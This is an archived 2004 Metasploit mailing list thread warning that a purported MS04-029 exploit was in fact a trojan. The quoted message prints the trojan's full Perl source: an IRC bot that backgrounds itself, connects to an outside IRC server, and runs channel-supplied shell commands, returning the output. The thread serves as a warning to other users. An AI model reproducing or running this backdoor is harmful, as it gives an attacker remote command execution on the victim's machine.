Metasploit mailing list archives
MS04-029 Exploit = trojan!
From: alekc at avet.com.pl (Aleksander P. Czarnowski)
Date: Thu, 4 Nov 2004 00:34:45 +0100
The sad or funny part (depends on your sens of humore) is that even if don't bother reading exploit source code before running it you can still see perl script with simple strings command run against binary. They could a least try to hide it a bit better on source code and binary level - after all tools like metasploit framework are used by people who can read assembly too ;-) Just my 2 cents, Aleksander Czarnowski AVET INS -----Original Message----- From: Jerome ATHIAS [mailto:jerome.athias at caramail.com] Sent: Wednesday, November 03, 2004 11:09 PM To: framework Subject: [framework] MS04-029 Exploit = trojan! #!/usr/bin/perl $chan="#0x";$nick="k";$server="ir3ip.net";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER k +i k :kv1\nNICK k\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#/tmp/hi Doh! bad shit yes SORRY guys - too fast - too bad C est le moment de dynamiser votre bo?te mail en cliquant ici !
Current thread:
- MS04-029 Exploit = trojan! Jerome ATHIAS (Nov 03)
- MS04-029 Exploit = trojan! H D Moore (Nov 03)
- MS04-029 Exploit = trojan! Aleksander P. Czarnowski (Nov 03)